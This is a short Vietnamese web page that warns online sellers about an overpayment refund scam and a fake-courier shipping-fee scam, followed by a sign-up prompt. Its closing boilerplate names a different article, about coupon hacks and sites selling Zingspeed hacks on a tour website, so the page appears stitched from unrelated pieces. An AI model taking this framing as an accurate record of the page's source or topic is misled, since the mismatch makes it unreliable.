Bạn nhận được một đơn hàng, sau đó khách “vô tình” chuyển nhiều tiền hơn giá trị đơn hàng rồi nhờ bạn chuyển lại số tiền thừa. Nếu không, họ sẽ yêu cầu bạn chuyển tiền phí giao hàng cho bên giao hàng mà họ chọn để được hưởng ưu đãi.
Tại sao? Đó rất có thể là một khoản thanh toán trái phép. Nếu bạn chuyển tiền cho họ, hoặc bên giao hàng có thể là giả mạo, bạn sẽ không thể lấy lại được tiền.
Giúp doanh nghiệp của bạn tránh khỏi hành vi gian lận ngay từ hôm nay.
Đăng ký miễn phí
Bạn đang đọc nội dung bài viết Thông Báo Về Việc Hack Coupon Và Những Website Lừa Đảo Bán Hack Zingspeed trên website Honggaitour.com. Hy vọng một phần nào đó những thông tin mà chúng tôi đã cung cấp là rất hữu ích với bạn. Nếu nội dung bài viết hay, ý nghĩa bạn hãy chia sẻ với bạn bè của mình và luôn theo dõi, ủng hộ chúng tôi để cập nhật những thông tin mới nhất. Chúc bạn một ngày tốt lành!